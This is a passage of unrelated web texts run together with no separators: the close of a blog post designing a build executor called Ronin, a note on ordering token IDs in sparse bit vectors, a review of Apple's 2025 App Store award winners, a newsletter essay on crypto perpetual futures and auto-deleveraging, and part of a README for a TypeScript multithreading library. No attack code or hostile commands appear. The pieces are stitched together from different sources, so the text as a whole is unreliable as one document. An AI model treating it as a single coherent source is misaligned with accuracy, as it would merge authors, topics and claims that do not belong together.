Tracing would be built on top of a FUSE file system that tracked file access.
3
Unlike other build systems I know, state (such as manifest hashes, content hashes, and removed outputs) would be stored in an SQLite database, not in flat files.
did you just reinvent buck2?
Kinda. Ronin takes a lot of ideas from buck2. It differs in two major ways:
It does not expect to be a top-level build system. It is perfectly happy to read (and encourages) generated files from a higher level configure tool. This allows systems like CMake and Meson to mechanically translate Ninja files into this new format, so builds for existing projects can get nice things.
It allows you to gradually transition from non-hermetic to hermetic builds, without forcing you to fix all your rules at once, and with tracing to help you find where you need to make your fixes. Buck2 doesn’t support tracing at all. It technically supports non-hermetic builds, but you don't get many benefits compared to using a different build system, and it's still high cost to switch build systems
4
.
The main advantage of Ronin is that it can slot in underneath existing build systems people are already using—CMake and Meson—without needing changes to your build files at all.
summary
In this post I describe what a build executor does, some features I would like to see from an executor (with a special focus on tracing), and a design for a new executor called
ronin
that allows existing projects generating ninja files to gradually transition to hermetic builds over time, without a “flag day” that requires rewriting the whole build system.
I don’t know yet if I will actually build this tool, that seems like a lot of work
5
😄 but it’s something I would like to exist in the world.
In many ways Conan
profiles
are analogous to ninja files: profiles are the interface between Conan and CMake in the same way that ninja files are the interface between CMake and Ninja. Conan is the only tool I'm aware of where the split between the package manager and the configure step is explicit.
↩
This is not an apple to apples comparison; ideally we would name the target by the output file, not by its alias. Unfortunately output names are unpredictable and quite long in Bazel.
↩
macOS does not have native support for FUSE.
MacFuse
exists but does not
support getting the PID
of the calling process. A possible workaround would be to start a new FUSE server for each spawned process group. FUSE on Windows is possible through
winfsp
.
↩
An earlier version of this post read "Buck2 only supports non-hermetic builds for
system toolchains
, not anything else", which is not correct.
↩
what if i simply took buck2 and hacked it to bits,,,
↩
I have a search index that stores, for each of a bunch of documents, the set of tokens that occur in that document. I encode that as a sparse bit vector, where each token has an ID and the bit at that index in the bit vector indicates whether that token is present in the document. Since most tokens do not occur in most documents, these vectors are sparse (most of the bits are zeros).
Since the vectors are sparse I can save a lot of space by not storing all the zero bits. The simplest way to do this is with different flavors of run-length encoding, but in order to make intersection and subset tests fast I actually use a representation that's more like the nodes in an
array-mapped tree
; there's a bitmask with one bit per 64-bit word of the bit vector indicating whether that word contains any nonzero bits, and we only store the 64-bit words that aren't zero.
Either way, whether we're using RLE or our mask encoding, the longer our contiguous runs of zeros are, the less data we have to store. While we don't get to pick what tokens occur in which documents, we do get to pick which tokens are next to each other in the vector; ie we're free to choose whatever token IDs we want. We want to choose token ids such that the one bits are all clumped together.
Another way to say we want one bits clumped together is to say we want to maximize the probability that a particular bit is a one given that its neighbors are ones, and maximize the propbability that a bit is a zero if its neighbors are zeros.
We can calculate those probabilities by generating a co-occurrence matrix. That's a symmetric matrix whose rows and columns are tokens, and where the value at a,b is the number of times a and b occur in the same document.
Now we want to choose an ordering of the rows where closer rows are closer together. We do that by finding the eigenvector of the matrix with the largest eigenvalue, multiplying by that vector (which gives us a single column vector), and then sorting by the values of that column vector. This is basically
doing PCA down to 1D
.
This works in practice, and gives me an overall 12% improvement in index size over choosing token ids at random.
★ 2025 App Store Award Winners: Tiimo, Essayist, and Detail
This year’s winners represent the best-in-class apps and games
we returned to again and again. We hope you enjoy them as much
as we do.
I did not enjoy all of them as much as Apple did.
Tiimo
iPhone app of the year
Tiimo
bills itself as an “AI Planner & To-do” app that is designed with accommodations for people with ADHD and other neurodivergences. Subscription plans cost $12/month ($144/year) or $54/year ($4.50/month). It does not offer a native Mac app, and at the end of onboarding/account setup, it suggests
their web app
for use on desktop computers. When I went to the web app, after signing in with the “Sign in With Apple” account I created on the iPhone app, Tiimo prompted me to sign up for an annual subscription for $42/year ($3.50/month), or monthly for $10 ($120/year). The in-app subscriptions offer a 30-day free trial; the less expensive pay-on-the-web subscriptions only offer a 7-day free trial. The web app doesn’t let you do anything without a paid account (or at least starting a trial); the iOS app offers quite a bit of basic functionality free of charge.
Built to support people who are neurodivergent (and anyone
distracted by the hum of modern life), Tiimo brought clarity to our
busy schedules using color-coded, emoji-accented blocks. The
calming visual approach made even the most hectic days feel
manageable.
It starts by syncing everything in Calendar and Reminders, pulling
in doctor’s appointments, team meetings, and crucial prompts to
walk the dog or stand up and stretch. Instead of dumping it all
into a jumbled list, the app gives each item meaning by
automatically assigning it a color and an emoji. (Tiimo gave us the
option to change the weightlifter emoji it added to our workout
reminders, but its pick was spot on.)
While on the move with coffee in one hand and keys in the other,
we sometimes talked to Tiimo with the Al chatbot feature to add new
tasks or shift appointments. When we felt overwhelmed by our to-do
list, Tiimo kept us laser-focused by bubbling up just high-priority
tasks, while its built-in Focus timer (accessible from any to-do
with a tap) saved us from the pitfalls of multitasking.
But Tiimo really stood out when we faced a big personal project,
like getting our Halloween decorations up before Thanksgiving.
With the help of Al, the app suggested all the smaller tasks
that would get us there: gathering the decorations from the
garage, planning the layout, securing the cobwebs, and doing a
safety check.
Aside from the web app,
Tiimo is iOS exclusive
, with apps only for iPhone, iPad, and Apple Watch. No Android version. It seems to do a good job with native platform integration (Calendar integration is free; Reminders integration requires a subscription). Animations in the app feel slow to me, which makes the app itself feel slow. And, personally, I find Tiimo’s emphasis on decorating everything with emoji
distracting and childish
, not clarifying.
The app seems OK, but not award-worthy to me. But, admittedly, I’m not in the target audience for Tiimo’s ADHD/neurodivergent focus. I don’t need reminders to have coffee in the morning, start work, have dinner, or to watch TV at night, which are all things Tiimo prefilled on my Today schedule after I went through onboarding. As I write this sentence, I’ve been using Tiimo for five minutes, and it’s already prompted me twice to rate it on the App Store. Nope, wait, I just got a third prompt. That’s thirsty, and a little gross. (And, although I’m not an ADHD expert, three prompts to rate and review the app in the first 10 minutes of use strikes me as contrary to the needs of the easily distracted.)
Essayist
Mac app of the year
Essayist
bills itself as “The Word Processor designed for Academic Writing” (capitalization verbatim). Subscriptions cost $80/year ($6.67/month) or $10/month ($120/year). Its
raison d’être
is managing citations and references, and automatically formatting the entire document, including citations, according to a variety of standards (MLA, Chicago, etc.). Quoting from
Apple’s own description of Essayist
:
Essayist gives you an easy way to organize a dizzying array of
primary sources. Ebooks, podcasts, presentations, and even direct
messages and emails can be cataloged with academic rigor. Using
macOS Foundation Models, Essayist extracts all the key info needed
to use it as a source.
For example, paste a YouTube URL into an entry and Essayist
automatically fills in the name of the video, its publication
date, and the date you accessed it. Drag in an article as a PDF to
have Essayist fill in the title, author, and more — and store the
PDF for easy access. You can also search for the books and journal
articles you’re citing right in the app.
Essayist is a document-based (as opposed to library-based) app, and its custom file format is a
package
with the adorable file extension “.essay”. The default font for documents is Times New Roman, and the only other option is, of all fonts,
Arial
— and you need an active subscription to switch the font to Arial. (
Paying money for the privilege to use Arial... Jiminy fucking christ. I might need a drink.
) I appreciate the simplicity of severely limiting font choices to focus the user’s attention on the writing, but offering Times New Roman and Arial as the only options means you’re left with the choice between “the default font’s default font” and “
font crime
”. The Essayist app itself
has no Settings
; instead, it offers only
per-document settings
.
The app carries a few whiffs of non-Mac-likeness (e.g. the aforementioned lack of Settings, and some
lame-looking custom alerts
). The document settings window refers to a new document, even after it has been saved with a name, as “Untitled” until you close and reopen the document. Reopened documents do not remember their window size and position. But
poking around with
otool
, it appears to be written using AppKit, not Catalyst. I suspected the app might be Catalyst because there are companion iOS apps for iPhone and iPad, which seem to offer identical feature sets as the Mac app. Essayist uses a clever system where, unless you have a subscription, documents can
only be edited on the device on which they were created
, but you can open them read-only on other devices. That feels like a good way to encourage paying while giving you a generous way to evaluate Essayist free of charge. There is no Android, Windows, or web app version — it’s exclusive to Mac and iOS.
I’ve never needed to worry about adhering to a specific format for academic papers, and that’s the one and only reason I can see to use Essayist. In all other aspects, it seems a serviceable but very basic, almost primitive, word processor. There’s no support for embedding images or figures of any kind in a document, for example.
Detail
iPad app of the year
Detail
bills itself, simply and to the point, as an “AI Video Editor”. The default subscription is $70/year ($5.83/month) with a 3-day free trial; the other option is to pay $12/month ($144/year) with no free trial. After a quick test drive, Detail seems like an excellent video editing app, optimized for creating formats common on social media, like reel-style vertical videos where you, the creator, appear as a cutout in the corner, in front of the video or images that you’re talking about. The iPhone version seems equally good. The iPad version of Detail will install and run on MacOS, but it’s one of those “Designed for iPad / Not verified for macOS” direct conversions. But they do offer a standalone Mac app,
Detail Studio
, which is a real Mac app, written using AppKit, which requires a separate subscription to unlock pro features ($150/year or $22/month). Detail only offers apps for iOS and MacOS — no Windows, Android, or web.
When we used Detail to record a conversation of two people sitting
side by side, the app automatically created a cut that looked like
it was captured with two cameras. It zoomed in on one speaker,
then cut away to the other person’s reaction. The app also made it
easy to unleash our inner influencer. We typed a few key points,
and the app’s AI wrote a playful script that it loaded into its
teleprompter so we could read straight to the camera.
Most importantly, Detail helped us memorialize significant life
moments all while staying present. At a birthday party, we propped
an iPad on a table and used Detail to record with the front and
back cameras simultaneously. The result was a split-screen video
with everyone singing “Happy Birthday” on the left and the guest
of honor blowing out the candles on the right. (No designated
cameraperson needed.)
Detail has a bunch of seemingly genuinely useful AI-based features. But putting all AI features aside, it feels like a thoughtful, richly featured
manual
video editor. I suspect that’s why the AI features might work well — they’re an ease-of-use / automation layer atop a professional-quality non-AI foundation. Basically, Detail seems like what Apple’s own Clips —
recently end-of-life’d
— should have been. It turns your iPad (or iPhone) into a self-contained video studio. Cool.
Of these three apps — Tiimo on iPhone, Essayist on Mac, and Detail on iPad — Detail appeals to me the most, and strikes me as the most deserving of this award. If I were to start making videos for modern social media, I’d strongly evaluate Detail as my primary tool.
Apple still has no standalone category for AI apps, but all three of these apps emphasize AI features, and Apple itself calls out those AI features in its praise for them. It’s an obvious recurring theme shared by all three, along with their shared monetization strategies of being free to download with in-app subscriptions to unlock all features, and the fact that all three winners are exclusive to iOS and Mac (and, in Tiimo’s case, the web).
Programming note
:
Bits about Money is
supported by our readers
. I generally forecast about one issue a month, and haven't kept that pace that this year. As a result, I'm working on about 3-4 for December.
Much financial innovation is in the ultimate service of the real economy. Then, we have our friends in crypto, who occasionally do intellectually interesting things which do not have a locus in the real economy. One of those things is perpetual futures (hereafter, perps), which I find fascinating and worthy of study, the same way that a virologist just loves geeking out about furin cleavage sites.
You may have read a lot about stablecoins recently. I may write about them (again; see
past BAM issue
) in the future, as there has in recent years been
some uptake
of them for payments. But it is useful to understand that a plurality of stablecoins collateralize perps. Some observers are occasionally
strategic
in whether they acknowledge this, but for payments use cases, it does not require a lot of stock to facilitate massive flows. And so of the
$300 billion or so in stablecoins presently outstanding
,
about a quarter
sit on exchanges. The majority of that is collateralizing perp positions.
Perps are the dominant way crypto trades, in terms of volume. (It bounces around but is typically
6-8 times larger than spot
.) This is similar to most traditional markets: where derivatives are available, derivative volume swamps spot volume. The degree to which depends on the market, Schelling points, user culture, and similar. For example, in India, most retail investing in equity is actually through derivatives; this is not true of the U.S. In the U.S., most retail equity exposure is through the spot market, directly holding stocks or indirectly through ETFs or mutual funds. Most
trading volume of the stock indexes
, however, is via derivatives.
Beginning with the problem
The large crypto exchanges are primarily casinos, who use the crypto markets as a source of numbers, in the same way a traditional casino might use a roulette wheel or set of dice. The function of a casino is for a patron to enter it with money and, statistically speaking, exit it with less. Physical casinos are often huge capital investments with large ongoing costs, including the return on that speculative capital. If they could choose to be less capital intensive, they would do so, but they are partially constrained by market forces and partially by regulation.
A crypto exchange is also capital intensive, not because the website or API took much investment (relatively low, by the standards of financial software) and not because they have a physical plant, but because trust is expensive. Bettors, and the more sophisticated market makers, who are the primary source of action for bettors, need to trust that the casino will actually be able to pay out winnings. That means the casino needs to keep assets (generally, mostly crypto, but including a smattering of cash for those casinos which are anomalously well-regarded by the financial industry) on hand exceeding customer account balances.
Those assets are… sitting there, doing nothing productive. And there is an implicit cost of capital associated with them, whether nominal (and borne by a gambler) or material (and borne by a sophisticated market making firm, crypto exchange, or the crypto exchange’s affiliate which trades against customers [0]).
Perpetual futures exist to provide the risk gamblers seek while decreasing the total capital requirement (shared by the exchange and market makers) to profitably run the enterprise.
Perps predate crypto but found a home there
In the commodities futures markets, you can contract to either buy or sell some standardized, valuable thing at a defined time in the future. The overwhelming majority of contracts do not result in taking delivery; they’re cancelled by an offsetting contract before that specified date.
Given that speculation and hedging are such core use cases for futures, the financial industry introduced a refinement: cash-settled futures. Now there is a reference price for the valuable thing, with a great deal of intellectual effort put into making that reference price robust and fair (not always successfully). Instead of someone notionally taking physical delivery of pork bellies or barrels of oil, people who are net short the future pay people who are net long the future on delivery day. (The mechanisms of this clearing are fascinating but outside today’s scope.)
Back in the early nineties economist Robert Shiller
proposed a refinement
to cash settled futures: if you don’t actually want pork bellies or oil barrels for consumption in April, and we accept that almost no futures participants actually do, why bother closing out the contracts in April? Why fragment the liquidity for contracts between April, May, June, etc? Just keep the market going
perpetually
.
This achieved its first widespread popular use in crypto (Bitmex is generally credited as being the popularizer), and hereafter we’ll describe the standard crypto implementation. There are, of course, variations available.
Multiple settlements a day
Instead of all of a particular futures vintage settling on the same day, perps settle multiple times a day for a particular market on a particular exchange. The mechanism for this is the
funding rate
. At a high level: winners get paid by losers every e.g. 4 hours and then the game continues, unless you’ve been blown out due to becoming overleveraged or for other reasons (discussed in a moment).
Consider a toy example: a retail user buys 0.1 Bitcoin via a perp. The price on their screen, which they understand to be for Bitcoin, might be $86,000 each, and so they might pay $8,600 cash. Should the price rise to $90,000 before the next settlement, they will get +/- $400 of winnings credited to their account, and their account will continue to reflect exposure to 0.1 units of Bitcoin via the perp. They might choose to sell their future at this point (or any other). They’ll have paid one commission (and a spread) to buy, one (of each) to sell, and perhaps they’ll leave the casino with their winnings, or perhaps they’ll play another game.
Where did the money come from? Someone else was symmetrically short exposure to Bitcoin via a perp. It is, with some very important caveats incoming, a closed system: since no good or service is being produced except the speculation, winning money means someone else lost.
One fun wrinkle for funding rates: some exchanges cap the amount the rate can be for a single settlement period. This is similar in intent to traditional markets’ usage of
circuit breakers
: designed to automatically blunt out-of-control feedback loops. It is dissimilar in that it cannot actually break circuits: changes to funding rate can delay realization of losses but can’t prevent them, since they don’t prevent the realization of symmetrical gains.
Perp funding rates also embed an interest rate component. This might get quoted as 3 bps a day, or 1 bps every eight hours, or similar. However, because of the impact of leverage, gamblers are paying more than you might expect: at 10X leverage that’s 30 bps a day. Consumer finance legislation standardizes borrowing costs as APR rather than basis points per day so that an unscrupulous lender can’t bury a 200% APR in the fine print.
Convergence in prices via the basis trade
Prices for perps do not, as a fact of nature, exactly match the underlying. That is a
feature
for some users.
In general, when the market is exuberant, the perp will trade above spot (the underlying market). To close the gap, a sophisticated market participant should do the
basis trade
: make offsetting trades in perps and spot (short the perp and buy spot, here, in equal size). Because the funding rate is set against a reference price for the underlying, longs will be paying shorts more (as a percentage of the perp’s current market price). For some of them, that’s fine: the price of gambling went up, oh well. For others, that’s a market incentive to close out the long position, which involves selling it, which will decrease the price at the margin (in the direction of spot).
The market maker can wait for price convergence; if it happens, they can close the trade at a profit, while having been paid to maintain the trade. If the perp continues to trade rich, they can just continue getting the increased funding cost. To the extent this is higher than
their own
cost of capital, this can be extremely lucrative.
Flip the polarities of these to understand the other direction.
The basis trade, classically executed, is delta neutral: one isn’t exposed to the underlying itself. You don’t need any belief in Bitcoin’s future adoption story, fundamentals, market sentiment, halvings, none of that. You’re getting paid to provide the gambling environment, including a really important feature: the perp price needs to stay
reasonably
close to the spot price, close enough to continue attracting people who want to gamble. You are also renting access to your capital for leverage.
You are also underwriting the exchange: if they blow up, your collateral becoming a claim against the bankruptcy estate is
the happy
scenario. (As one motivating example: Galois Capital, a crypto hedge fund doing basis trades, had ~40% of its assets on FTX when it went down. They then wound down the fund, selling the bankruptcy claim for
16 cents on the dollar
.)
Recall that the market can’t function without a system of trust saying that someone is good for it if a bettor wins. Here, the market maker is good for it, via the collateral it kept on the exchange.
Many market makers function across many different crypto exchanges. This is one reason they’re so interested in capital efficiency: fully collateralizing all
potential
positions they could take across the universe of venues they trade on would be prohibitively capital intensive, and if they do not pre-deploy capital, they miss profitable trading opportunities. [1]
Leverage and liquidations
Gamblers like risk; it amps up the fun. Since one has many casinos to choose from in crypto, the ones which only “regular” exposure to Bitcoin (via spot or perps) would be offering a less-fun product for many users than the ones which offer leverage. How much leverage?
More leverage
is always the answer to that question, until predictable consequences start happening.
In a standard U.S. brokerage account,
Regulation T
has, for almost 100 years now, set maximum leverage limits (by setting minimums for margins). These are 2X at position opening time and 4X “maintenance” (before one closes out the position). Your brokerage would be obligated to forcibly close your position if volatility causes you to exceed those limits.
As a simplified example, if you have $50k of cash, you’d be allowed to buy $100k of stock. You now have $50k of equity and a $50k loan: 2x leverage. Should the value of that stock decline to about $67k, you still owe the $50k loan, and so only have $17k remaining equity. You’re now on the precipice of being 4X leveraged, and should expect a margin call very soon, if your broker hasn’t “blown you out of the trade” already.
What part of that is relevant to crypto? For the moment, just focus on that number: 4X.
Perps are offered at 1X (non-levered exposure). But they’re
routinely offered
at 20X, 50X, and 100X. SBF, during his press tour / regulatory blitz about being a responsible financial magnate fleecing the customers
in an orderly fashion
, voluntarily
self-limited FTX to 20X
.
One reason perps are structurally better for exchanges and market makers is that they simplify the business of blowing out leveraged traders. The exact mechanics depend on the exchange, the amount, etc, but generally speaking you can either force the customer to enter a closing trade or you can assign their position to someone willing to bear the risk in return for a discount.
Blowing out losing traders is lucrative for exchanges except when it catastrophically isn’t. It is a priced service in many places. The price is quoted to be low (
“a nominal fee of 0.5%
” is one way Binance describes it) but, since it is calculated from the amount at risk, it can be a large portion of the money lost. If the account’s negative balance is less than the liquidation fee, wonderful, thanks for playing and the exchange / “the insurance fund” keeps the rest, as a tip.
In the case where the amount an account is negative by is more than the fee, that “insurance fund” can choose to pay the winners on behalf of the liquidated user, at management’s discretion. Management will
usually
decide to do this, because a casino with a reputation for not paying winners will not long remain a casino.
But tail risk is a real thing. The capital efficiency
has a price
: there physically does not exist enough money in the system to pay all winners given sufficiently dramatic price moves. Forced liquidations happen. Sophisticated participants withdraw liquidity (for reasons we’ll soon discuss) or the exchange becomes overwhelmed technically / operationally. The forced liquidations eat through the diminished / unreplenished liquidity in the book, and the magnitude of the move increases.
Then crypto
gets reminded
about automatic deleveraging (ADL), a detail to perp contracts that few participants understand.
We have altered the terms of your unregulated futures investment contract.
Risk in perps has to be symmetric: if (accounting for leverage) there are 100,000 units of Somecoin exposure long, then there are 100,000 units of Somecoin exposure short. This does not imply that the shorts or longs are sufficiently capitalized to
actually pay
for all the exposure in all instances.
In cases where management deems paying winners from the insurance fund would be too costly and/or impossible, they automatically deleverage some winners. In theory, there is a published process for doing this, because it would be confidence-costing to ADL non-affiliated accounts but pay out affiliated accounts, one’s friends or particularly important counterparties, etc. In theory.
In theory, one likely ADLs accounts which were quite levered before ones which were less levered, and one ADLs accounts which had high profits before ones with lower profits. In theory. [2]
So perhaps you understood, prior to a 20% move, that you were 4X leveraged. You just earned 80%, right? Ah, except you were only 2X leveraged, so you earned 40%. Why were you
retroactively
only 2X? That’s what automatic deleveraging means. Why couldn’t you get the other 40% you feel entitled to? Because the collective group of losers doesn’t have enough to pay you your winnings and the insurance fund was insufficient or deemed insufficient by management.
ADL is particularly painful for sophisticated market participants doing e.g. a basis trade, because they thought e.g. they were 100 units short via perps and 100 units long
somewhere else
via spot. If it turns out they were actually 50 units short via perps, but 100 units long, their net exposure is +50 units, and they have very possibly just gotten absolutely shellacked.
In theory, this can happen to the upside or the downside.
In practice
in crypto, this seems to usually happen after sharp decreases in prices, not sharp increases. For example, October 2025 saw widespread ADLing as (more than)
$19 billion of liquidations
happened, across a variety of assets. Alameda’s CEO Caroline Ellison
testified
that they lost over $100 million during the collapse of Terra’s stablecoin in 2022, but since FTX’s insurance fund
was made up
; when leveraged traders lost money, their positions were frequently taken up by Alameda. That was quite lucrative much of the time, but catastrophically expensive during e.g. the Terra blowup. Alameda was a good loser and paid the winners, though: with other customers’ assets that they “borrowed.”
An aside about liquidations
In the traditional markets, if one’s brokerage deems one’s assets are unlikely to be able to cover the margin loan from the brokerage one has used, one’s brokerage will issue a margin call. Historically that gave one a relatively short period (typically, a few days) to post additional collateral, either by moving in cash, by transferring assets from another brokerage, or by experiencing appreciation in the value of one’s assets. Brokerages have the option, and in some cases the requirement, to manage risk after or during a margin call by forcing trades on behalf of the customer to close positions.
It sometimes surprises crypto natives that, in the case where one’s brokerage account goes negative and all assets are sold, with a negative remaining balance, the traditional markets largely
still expect you to pay that balance
. This contrasts with crypto, where the market expectation for many years was that the customer was Daffy Duck with a gmail address and a pseudonymous set of numbered accounts recorded on a blockchain, and dunning them was a waste of time. Crypto exchanges have mostly, in the intervening years, either stepped up their game regarding
KYC
or pretended to do so, but the market expectation is still that a defaulting user will basically never successfully recover. (Note that the legal obligation to pay is not coextensive with users actually paying. The retail speculators with $25,000 of capital that the pattern day trade rules are worried about will often not have $5,000 to cover a deficiency. On the other end of the scale, when a hedge fund blows up, the fund entity is wiped out, but its limited partners—pension funds, endowments, family offices—are not on the hook to the prime broker, and nobody expects the general partner to start selling their house to make up the difference.)
So who bears the loss when the customer doesn’t, can’t, or won’t? The waterfall depends on market, product type, and geography, but as a sketch: brokerages bear the loss first, out of their own capital. They’re generally required to keep a reserve for this purpose.
A brokerage will, in the ordinary course of business, have obligations to other parties which would be endangered if they were catastrophically mismanaged and could not successfully manage risk during a downturn. (It’s been known to happen, and even can be associated with
assets rather than liabilities
.) In this case, most of those counterparties are partially insulated by structures designed to insure the peer group. These include e.g. clearing pools, guaranty funds capitalized by the member firms of a clearinghouse, the clearinghouse’s own capital, and perhaps mutualized insurance pools. That is the rough ordering of the waterfall, which varies depending geography/product/market.
One can imagine a true catastrophe which burns through each of those layers of protection, and in that case, the clearinghouse might be forced to assess members or allocate losses across survivors. That would be a very, very bad day, but contracts exist to be followed on very bad days.
One commonality with crypto, though: this system is also not fully capitalized against all possible events at all times. Unlike crypto, which for contingent reasons pays some lip service to being averse to credit even as it embraces leveraged trading, the traditional industry relies
extensively
on underwriting risk of various participants.
Will crypto successfully “export” perps?
Many crypto advocates believe that they have something which the traditional finance industry desperately needs. Perps are crypto’s most popular and lucrative product, but they probably won’t be adopted materially in traditional markets.
Existing derivatives products already work reasonably well at solving the cost of capital issue. Liquidations are not the business model of traditional brokerages. And learning, on a day when markets are 20% down, that you might be hedged or you might be bankrupt, is not a prospect which fills traditional finance professionals with the warm fuzzies.
And now you understand the crypto markets a bit better.
[0] Brokers trading with their own customers can happen in the ordinary course of business, but has been progressively discouraged in traditional finance, as it enables frontrunning.
Frontrunning, while it is understood in the popular parlance to mean “trading before someone else can trade” and often brought up in discussions of high frequency trading using very fast computers, does not historically mean that. It historically describes a single abusive practice: a broker could basically use
the slowness
of traditional financial IT systems to give conditional post-facto treatment to customer orders, taking the other side of them (if profitable) or not (if not). Frontrunning basically disappeared because customers now get order confirms almost instantly by computer not at end of day via a phone call. The confirm has the price the trade executed at on it.
In classic frontrunning, you sent the customer’s order to the market (at some price X), waited a bit, and then observed a later price Y. If Y was worse for the customer than X, well, them’s the breaks on Wall Street. If Y was better, you congratulated the customer on their investing acumen, and informed them that they had successfully transacted at Z, a price of your choosing between X and Y. You then fraudulently inserted a recorded transaction between the customer and yourself earlier in the day, at price Z, and assigned the transaction which happened at X to your own account, not to the customer’s account.
Frontrunning was a lucrative scam while it lasted, because (effectively) the customer takes 100% of the risk of the trade but the broker gets any percentage they want of the first day’s profits. This is potentially
so
lucrative that smart money (and some investors in his funds!) thought Madoff was doing it, thus generating the better-than-market stable returns for over a decade through malfeasance. Of frontrunning Madoff was entirely innocent.
Some more principled crypto participants have attempted to discourage exchanges from trading with their own customers. They have mostly been unsuccessful: Merit Peak Limited is Binance’s captive entity which does this. It also is occasionally described by U.S. federal agencies as running a sideline in money laundering, Alameda Research was FTX’s affiliated trading fund. Their management was criminally convicted of money laundering. etc, etc.
One of the reasons this behavior is so adaptive is because the billions of dollars sloshing around can be described to banks as “proprietary trading” and “running an OTC desk”, and an inattentive bank (like, say, Silvergate, as
recounted here
) might miss the customer fund flows they would have been formally unwilling to facilitate. This is a useful feature for sophisticated crypto participants, and so some of them do not draw attention to the elephant in the room, even though it is averse to their interests.
[1] Not
all
crypto trades are pre-funded. Crypto OTC transactions sometimes settle on T+1, with the OTC desk essentially extending credit in the fashion that a prime broker would in traditional markets. But most transactions on exchanges have to be paid immediately in cash already at the venue. This is very different from traditional equity market structure, where venues don’t typically receive funds flow at all, and settling/clearing happens after the fact, generally by a day or two.
[2] I note, for the benefit of readers of footnote 0, that there is often a substantial gap between the time when market dislocation happens and when a trader is informed they were ADLed. The implications of this are left as an exercise to the reader.
Want more essays in your inbox?
I write about the intersection of tech and finance, approximately biweekly. It's free.
The missing standard library for multithreading in JavaScript
Multithreading
is a TypeScript library that brings robust, Rust-inspired concurrency primitives to the JavaScript ecosystem. It provides a thread-pool architecture, strict memory safety semantics, and synchronization primitives like Mutexes, Read-Write Locks, and Condition Variables.
This library is designed to abstract away the complexity of managing
WebWorkers
, serialization, and
SharedArrayBuffer
complexities, allowing developers to write multi-threaded code that looks and feels like standard asynchronous JavaScript.
Installation
npm install multithreading
Core Concepts
JavaScript is traditionally single-threaded. To achieve true parallelism, this library uses Web Workers. However, unlike standard Workers, this library offers:
Managed Worker Pool
: Automatically manages a pool of threads based on hardware concurrency.
Shared Memory Primitives
: Tools to safely share state between threads without race conditions.
Scoped Imports
: Support for importing external modules and relative files directly within worker tasks.
Move Semantics
: Explicit data ownership transfer to prevent cloning overhead.
Quick Start
The entry point for most operations is the
spawn
function. This submits a task to the thread pool and returns a handle to await the result.
import{spawn}from"multithreading";// Spawn a task on a background threadconsthandle=spawn(()=>{// This code runs in a separate workerconstresult=Math.random();returnresult;});// Wait for the resultconstresult=awaithandle.join();if(result.ok){console.log("Result:",result.value);// 0.6378467071314606}else{console.error("Worker error:",result.error);}
Passing Data: The
move()
Function
Because Web Workers run in a completely isolated context, functions passed to
spawn
cannot capture variables from their outer scope. If you attempt to use a variable inside the worker that was defined outside of it, the code will fail.
To get data from your main thread into the worker, you have to use the
move()
function.
The
move
function accepts variadic arguments. These arguments are passed to the worker function in the order they were provided. Despite the name,
move
handles data in two ways:
Transferable Objects (e.g.,
ArrayBuffer
,
Uint32Array
):
These are "moved" (zero-copy). Ownership transfers to the worker, and the original becomes unusable in the main thread.
Non-Transferable Objects (e.g., JSON, numbers, strings):
These are cloned via structured cloning. They remain usable in the main thread.
import{spawn,move}from"multithreading";// Will be transferedconstlargeData=newUint8Array(1024*1024*10);// 10MB// Will be clonedconstmetaData={id: 1};// We pass arguments as a comma-separated list.consthandle=spawn(move(largeData,metaData),(data,meta)=>{console.log("Processing ID:",meta.id);returndata.byteLength;});awaithandle.join();
SharedJsonBuffer: Sharing Complex Objects
SharedJsonBuffer
enables Mutex-protected shared memory for JSON objects, eliminating the overhead of
postMessage
data copying. Unlike standard buffers, it handles serialization automatically. It supports partial updates, re-serializing only changed bytes rather than the entire object tree for high-performance state synchronization.
import{move,Mutex,SharedJsonBuffer,spawn}from"multithreading";constsharedState=newMutex(newSharedJsonBuffer({score: 0,players: ["Main Thread"],level: {id: 1,title: "Start",},}));awaitspawn(move(sharedState),async(lock)=>{
using guard=awaitlock.acquire();conststate=guard.value;console.log(`Current Score: ${state.score}`);// Modify the datastate.score+=100;state.players.push("Worker1");// End of scope: Lock is automatically released here}).join();// Verify on main thread
using guard=awaitsharedState.acquire();console.log(guard.value);// { score: 100, players: ["Main Thread", "Worker1"], ... }
Synchronization Primitives
When multiple threads access shared memory (via
SharedArrayBuffer
), race conditions occur. This library provides primitives to synchronize access safely.
Best Practice:
It is highly recommended to use the asynchronous methods (e.g.,
acquire
,
read
,
write
,
wait
) rather than their synchronous counterparts. Synchronous blocking halts the entire Worker thread, potentially pausing other tasks sharing that worker.
1. Mutex (Mutual Exclusion)
A
Mutex
ensures that only one thread can access a specific piece of data at a time.
Option A: Automatic Management (Recommended)
This library leverages the
Explicit Resource Management
proposal (
using
keyword). When you acquire a lock, it returns a guard. When that guard goes out of scope, the lock is automatically released.
import{spawn,move,Mutex}from"multithreading";constbuffer=newSharedArrayBuffer(4);constcounterMutex=newMutex(newInt32Array(buffer));spawn(move(counterMutex),async(mutex)=>{// 'using' automatically calls dispose() at the end of the scope
using guard=awaitmutex.acquire();guard.value[0]++;// End of scope: Lock is automatically released here});
Option B: Manual Management (Bun / Standard JS)
If you are using
Bun
(which doesn't natively support
using
and uses a transpiler which is incompatible with this library) or prefer standard JavaScript syntax, you must manually release the lock using
drop()
. Always use a
try...finally
block to ensure the lock is released even if an error occurs.
import{spawn,move,Mutex}from"multithreading";constbuffer=newSharedArrayBuffer(4);constcounterMutex=newMutex(newInt32Array(buffer));spawn(move(counterMutex),async(mutex)=>{// Note that we have to import drop here, otherwise it wouldn't be availableconst{ drop }=awaitimport("multithreading");// 1. Acquire the lock manuallyconstguard=awaitmutex.acquire();try{// 2. Critical Sectionguard.value[0]++;}finally{// 3. Explicitly release the lockdrop(guard);}});
2. RwLock (Read-Write Lock)
A
RwLock
is optimized for scenarios where data is read often but written rarely. It allows
multiple
simultaneous readers but only
one
writer.
import{spawn,move,RwLock}from"multithreading";constlock=newRwLock(newInt32Array(newSharedArrayBuffer(4)));// Spawning a Writerspawn(move(lock),async(l)=>{// Blocks until all readers are finished (asynchronously)
using guard=awaitl.write();guard.value[0]=42;});// Spawning Readersspawn(move(lock),async(l)=>{// Multiple threads can hold this lock simultaneously
using guard=awaitl.read();console.log(guard.value[0]);});
3. Semaphore
A
Semaphore
limits the number of threads that can access a resource simultaneously. Unlike a Mutex (which allows exactly 1 owner), a Semaphore allows
N
owners. This is essential for rate limiting, managing connection pools, or bounding concurrency.
